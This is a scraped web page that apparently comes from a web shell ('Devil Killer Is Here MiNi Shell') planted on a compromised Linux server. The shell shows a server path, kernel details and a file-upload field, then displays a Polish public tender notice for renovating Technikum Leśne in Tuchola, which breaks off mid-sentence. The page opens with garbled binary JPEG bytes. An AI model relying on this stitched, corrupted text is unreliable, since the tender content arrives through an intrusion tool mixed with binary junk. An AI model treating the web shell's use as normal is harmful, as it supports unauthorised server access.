JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250331/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250331/0016934301-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Prace remontowo-modernizacyjne na poziomie piętra i parteru w Technikum Leśnym w Tucholi im. Adama Loreta </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Technikum Leśne w Tucholi</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 340343745</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Nowodworskiego 9-13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tuchola</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">89-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL618 - Świecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@tltuchola.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.tltuchola.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> szkoła średnia podlegająca resortowi </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Prace remontowo-modernizacyjne na poziomie piętra i parteru w Technikum Leśnym w Tucholi im. Adama Loreta </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6a442851-d549-41b7-8339-ed4e30c3d249</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00169343</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-03-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00056753/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Prace remontowo-modernizacyjne na poziomie piętra i parteru w Technikum Leśnym w Tucholi im. Adama Loreta</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-6a442851-d549-41b7-8339-ed4e30c3d249 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">5.2. W postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia,<br/>która jest dostępna pod adresem https://ezamowienia.gov.pl.<br/>5.3. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>5.4. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia<br/>publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie<br/>e-Zamówienia.<br/>5.5. Szczegółowe informacje na temat zakładania kont podmiotów<br/>oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin<br/>Platformy e-Zamówienia, dostępny na stronie internetowej<br/>https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum<br/>Pomocy”.<br/>Szczegółowe informacje zawarto w rozdz.5 SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Szczegółowe informacje na temat<br/>zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin<br/>Platformy e-Zamówienia, dostępny na stronie internetowej<br/>https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum<br/>Pomocy”.<br/>5.6. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga<br/>posiadania konta na Platformie e-Zamówienia ani logowania.<br/>5.7. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych<br/>będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe<br/>odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu<br/>Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>5.8. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady<br/>Ministrów w sprawie wymagań dla dokumentów elektronicznych, sporządza się<br/>w postaci elektronicznej, w formatach danych określonych w przepisach<br/>rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności,<br/>z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki.<br/>5.9. Wykaz poszczególnych dokumentów i oświadczeń składanych w postępowaniu oraz ich forma, sposób sporządzania i<br/>przekazywania zostały określone przez Zamawiającego w rozdz.8 i 9 SWZ.<br/>Szczegółowe informacje zawarto w rozdz.5 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">24.1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1) administratorem Pani/Pana danych osobowych jest Pani/Pana danych osobowych jest Technikum Leśne w Tucholi im. Adama<br/>Loreta, ul. Nowodworskiego 9-13, 89-500 Tuchola, w imieniu której działa Dyrektor Technikum Leśnego w Tucholi,<br/>Kontakt: numer telefonu: (0-52) 3348661, faks: (0-52) 3348665<br/>e-mail: sekretariat@tltuchola.pl<br/>2) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c) RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego prowadzonym w trybie podstawowym bez negocjacji.<br/>3) Odbiorcami Pani/Pana danych osobowych:<br/>- będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 oraz art.. 253 Ustawy z<br/>dnia 11 września 2019 r. Prawo zamówień publicznych (j.t. Dz. U. z 2019 r., poz. 1129) dalej „ustawy Pzp”.<br/>- będą upoważnieni pracownicy Administratora Danych Osobowych,<br/>- mogą być podmioty upoważnione na podstawie przepisów prawa oraz podwykonawcy związani z<br/>Administratorem Danych umowami powierzenia przetwarzania danych osobowych.4) Pani/Pana dane osobowe będą<br/>przechowywane zgodnie z art. 78 ust. 1 i 4 ustawy Pzp,przez okres 4 lat od dnia zakończenia postępowania o udzieleniezamówienia (a jeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwania umowy), a następnie według kategorii archiwalnej dokumentacji postępowania o<br/>udzielenie zamówienia.<br/>5) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp.<br/>6) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>7) posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących *;<br/>- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">8) nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b), d) lub e) RODO prawo do usunięcia danych osobowych,<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c) RODO,<br/>9) w sprawach z zakresu ochrony danych osobowych można kontaktować się z Inspektorem Ochrony Danych, pod adresem e-mail:<br/>iod@comp-net.pl<br/>* Wyjaśnienie: w przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez zamawiającego, z uprawnienia, o<br/>którym mowa w art. 15 ust. 1-3 RODO, Zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych<br/>informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia.<br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać<br/>integralności protokołu oraz jego załączników.<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">D.26-10/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie: „Prace remontowo-modernizacyjne na poziomie piętra i parteru w Technikum<br/>Leśnym w Tucholi im. Adama Loreta”<br/>Adres inwestycji:<br/>Działka Nr.: 6004/24<br/>Obręb: Miasto Tuchola (0001)<br/>Jed. ewid.:Tuchola (041606_4)<br/>Inwestorem jest Technikum Leśne w Tucholi im. Adama Loreta<br/>ul. Nowodworskiego 9 89-500 Tuchola.<br/>3.2. Ogólny zakres robót:<br/>Szczegółowy zakres robót określony został w projekcie budowlanym, dokumentacji technicznej określającej przedmiot<br/>zamówienia oraz przedmiarze robót (dokument pomocniczy służący do przygotowania oferty) – stanowiącej w załącznik nr 1<br/>do SWZ.<br/>3.3. Ogólny zakres prac budowlanych budowlane<br/>Inwestycję podzielono na niżej wymienione etapy:<br/>Etap V: Prace remontowe w pomieszczeniu warsztatowym na poziomie parteru<br/>OGÓLNY ZAKRES PRAC BUDOWLANYCH<br/>1. BUDOWLANE:<br/> prace rozbiórkowewykonanie otworów drzwiowych (wraz z osadzeniem drzwi)<br/> postawienie ścianki działowej w celu wydzielenia pomieszczeń (ścianki plastikowa<br/>system okienny)<br/> prace glazurnicze<br/> montaż parapetów<br/> prace wykończeniowe (tynki, gładzie malowanie, sufity podwieszane – na cześci)<br/> montaż stolarki okiennej jak i drzwiowej<br/> osadzenie systemu podtynkowego geberit<br/> malowanie klatki schodowej<br/>2. INSTALACJE ELEKTRYCZNE:<br/> wykonanie pełnej instalacji elektrycznej dla danego etapu<br/> montaż suszarek do rąk<br/>3. INSTALACJE SANITARNE:<br/> wykonanie wentylacji wyciągowej w sanitariatach z podłączeniem do istniejących<br/>kominów<br/> wymiana istniejących grzejników<br/> biały montaż<br/> montaż hydrantu wraz z podejściem<br/>Wszelkie materiały jak i wybrane produkty muszą być zaakceptowane przez<br/>zleceniodawcę.<br/>Etap VI: Prace remontowe w pomieszczeniu szatni na poziomie piętra Tuchola<br/>OGÓLNY ZAKRES PRAC BUDOWLANYCH<br/>1. BUDOWLANE:<br/> prace rozbiórkowe<br/> budowa ścianek działowych<br/> montaż wygrodzeń szatniowych<br/> wykonanie otworów drzwiowych (wraz z osadzeniem drzwi)<br/> postawienie ścianki działowej w celu wydzielenia pomieszczeń (ścianki plastikowa<br/> system okienny)<br/> prace glazurnicze<br/> montaż parapetów<br/> prace wykończeniowe (tynki, gładzie malowanie, sufity podwieszane – na cześci)<br/> montaż stolarki okiennej jak i drzwiowej<br/> osadzenie systemu podtynkowego geberit<br/> malowanie klatki schodowej<br/>2. INSTALACJE ELEKTRYCZNE:<br/> wykonanie pełnej instalacji elektrycznej dla danego etapu<br/> montaż suszarek do rąk<br/> podłączenie centrali wentylacyjnej<br/> podłączenie pompy ciepła<br/>3. INSTALACJE SANITARNE:<br/> wykonanie wentylacji wyciągowej w sanitariatach z podłączeniem do istniejących<br/>kominów<br/> wymiana istniejących grzejników<br/> biały montaż<br/> montaż hydrantu wraz z podejściem<br/> montaż wentylacji mechanicznej, pompy ciepła<br/>Wszelkie materiały jak i wybrane produkty muszą być zaakceptowane przez zleceniodawcę.<br/>3.4. Całość robót wykonać zgodnie z załączoną dokumentacją. Roboty ziemne i montażowe zewnętrzne i wewnętrzne<br/>wykonać zgodnie z warunkami technicznymi. W czasie prowadzenia robót ziemnych mechanicznych i ręcznych należy<br/>przestrzegać przepisów BHP ogólnych i branżowych.<br/>3.5. Wykonawca ma obowiązek zapoznania się z pełną dokumentacją techniczną, która stanowi część niniejszej<br/>specyfikacji. Zamawiający zaleca dokonanie wizji lokalnej placu budowy, w celu zapoznania się z warunkami wykonania<br/>robót oraz zdobycie wszelkich informacji, które mogą być konieczne do przygotowania oferty oraz należytego wykonania<br/>zamówienia, w szczególności w zakresie sprawdzenia kompletności i poprawności dokumentacji przetargowej. Koszty<br/>związane z przeprowadzeniem wizji lokalnej ponosi samodzielnie każdy Wykonawca. Zamawiający umożliwi Wykonawcy<br/>wstęp na teren planowanej inwestycji, w uzgodnionym terminie.<br/>3.6. W czasie wykonywania robót miejsce prowadzenia prac należy tak zabezpieczyć aby uniknąć wszelkich<br/>przypadkowych uszkodzeń ludzi i mienia.<br/>3.7. Mimo, iż rozliczenie zadania jest ryczałtowe, Zamawiający wymaga, aby Wykonawca wybrany w niniejszym<br/>postępowaniu dostarczył kosztorys ofertowy (najpóźniej w dniu podpisania umowy). Ewentualne zmiany, które wystąpią w<br/>kosztorysie powykonawczym, w stosunku do kosztorysu ofertowego, należy szczegółowo opisać w zakresie merytorycznym,<br/>obmiarowym i kosztowym.<br/>Zgodność robót z dokumentacją techniczną: Wykonawca jest odpowiedzialny za jakość prac i ich zgodność z dokumentacją<br/>kontraktową i techniczną, specyfikacjami technicznymi i instrukcjami zarządzającego realizacją umowy.<br/>3.8. Wykonawca dostarczy na budowę i będzie utrzymywał wyposażenie konieczne dla zapewnienia bezpieczeństwa. Przedrozpoczęciem prac należy zabezpieczyć teren prowadzonych prac i plac na materiały budowlane oraz rozbiórkowe w<br/>sposób umożliwiający bezpieczne korzystanie uczniom i osobom przebywającym na terenie Technikum Leśnego z ciągów<br/>komunikacyjnych – zgodnie z projektem budowlanym. Zamawiający wymaga, aby ekipa remontowa charakteryzowała się<br/>wysoką kulturą osobistą ze względu na prowadzenie prac w budynku szkolnym. Ponadto zabrania się palenia papierosów<br/>na terenie budowy oraz niewłaściwego użytkowania urządzeń lub maszyn niezbędnych do wykonania robót, co groziłoby<br/>ewentualnym zaprószeniem ognia. W związku z prowadzeniem zajęć w części tych pomieszczeń i pomieszczeniach<br/>przyległych prace mogą być prowadzone wyłącznie w dniach od poniedziałku do piątku w godzinach 10-14 i 16-20 oraz<br/>soboty i niedziele (godziny do uzgodnienie z zamawiającym).<br/>3.9. W trakcie realizacji robót wykonawca będzie stosował się do wszystkich obowiązujących przepisów i wymagań w<br/>zakresie bezpieczeństwa i ochrony zdrowia. W tym celu, w ramach prac przygotowawczych do realizacji robót, zgodnie z<br/>wymogami ustawy – Prawo budowlane jest zobowiązany opracować program zapewnienia bezpieczeństwa i ochrony<br/>zdrowia. Na jego podstawie musi zapewnić, żeby personel nie pracował w warunkach, które są niebezpieczne, szkodliwe<br/>dla zdrowia i nie spełniają odpowiednich wymagań sanitarnych.<br/>Wykonawca jest odpowiedzialny za bezpieczeństwo pracowników wykonujących prace remontowe oraz za bezpieczeństwo<br/>osób przebywających w pobliżu. Wykonawca odpowiada za ewentualne straty spowodowane swoją działalnością na terenie<br/>prowadzonych prac jak i w mieniu które zostało zniszczone, czy uszkodzone w wyniku prowadzonych prac.<br/>3.10. W trakcie trwania budowy i przed zakończeniem robót Wykonawca jest zobowiązany do dostarczania na polecenie<br/>zarządzającego realizacją umowy następujących dokumentów:<br/> rysunki robocze,<br/> aktualizacja harmonogramu robót i finansowania,<br/> dokumentacja powykonawcza.<br/>3.11. Zamawiający wymaga, by czynności bezpośrednio związane z realizacją robót budowlanych wykonywane były przez<br/>osoby zatrudnione przez Wykonawcę na podstawie umowy o pracę w rozumieniu ustawy z dnia 26 czerwca 1974 r. –<br/>Kodeks pracy (t.j. Dz. U. z 2023 r. poz. 1465, ze zm.), o ile nie są one wykonywane przez dane osoby osobiście w ramach<br/>prowadzonej przez nie na podstawie wpisu do CEIDG działalności gospodarczej -załącznik nr 11 -wzór umowy. Wymóg<br/>zatrudnienia na umowę o pracę nie dotyczy osób kierujących budową i robotami, osób wykonujących usługi projektowe,<br/>geodezyjne oraz osób świadczących usługi transportowe i sprzętowe.<br/>3.12. Ponadto Wykonawca przed przystąpieniem do wykonywania robót:<br/> najpóźniej w dniu przekazania terenu budowy, złoży wykaz osób oddelegowanych do realizacji zamówienia wraz z<br/>oświadczeniem o tym, że są zatrudnieni na podstawie umowy o pracę;<br/> wskaże osoby funkcyjne budowy, wraz ze złożonymi przez nie oświadczeniami o podjęciu obowiązków kierownika budowy i<br/>robót.<br/>3.13. Wykonawca, który będzie realizował przedmiotową inwestycję, zobowiązany będzie udzielić Zamawiającemu<br/>minimum 36 miesięcy gwarancji na wykonane roboty budowlane Wykonawca zobowiązuje się do zrealizowania wszystkich<br/>robót zgodnie z dokumentacją projektową, zasadami wiedzy technicznej i obowiązującymi w Rzeczypospolitej Polskiej<br/>przepisami prawa powszechnie obowiązującego.<br/>3.14. Wszelkie zaistniałe wątpliwości Wykonawca powinien konsultować<br/>z Zamawiającym.<br/>3.15. Zastosowane materiały i urządzenia winny odpowiadać deklaracjom zgodności z Polskimi Normami, atestami i<br/>aprobatami technicznymi. Podane w niniejszej SWZ, w dokumentacji projektowej, przedmiarze robót i specyfikacji<br/>technicznej wykonania i odbioru robót nazwy własne (pochodzenie, producent itd.) mają jedynie charakter pomocniczy dla<br/>określenia podstawowych parametrów i cech zastosowanych materiałów, produktów, urządzeń czy wyposażenia.<br/>Zamawiający dopuszcza zastosowanie rozwiązań równoważnych. Produkt równoważny to taki, który ma te same cechy<br/>funkcjonalne, co wskazany w dokumentacji konkretny z nazwy lub pochodzenia produkt. Jego jakość nie może być gorsza<br/>od jakości określonego w specyfikacji i dokumentacji budowlanej produktu oraz powinien mieć parametry nie gorsze niż<br/>wskazany produkt.<br/>3.16. Zamawiający uzna, że oferta jest równoważna, jeżeli przedstawia przedmiot zamówienia o właściwościach<br/>funkcjonalnych i jakościowych takich samych lub lepszych od tych, które zostały określone w SWZ, lecz oznaczonych innym<br/>znakiem towarowym, patentem lub pochodzeniem. Przy czym istotne jest to, że produkt równoważny to produkt, który nie<br/>jest identyczny, tożsamy z produktem referencyjnym, ale posiada pewne, istotne dla Zamawiającego, zbliżone do produktu<br/>referencyjnego cechy i parametry.<br/>Szczegółowe informacje dotyczące przedmiotu zamówienia zawarto w SWZ i jej załącznikach. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">1 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybierze ofertę najkorzystniejszą spośród ofert nie odrzuconych na 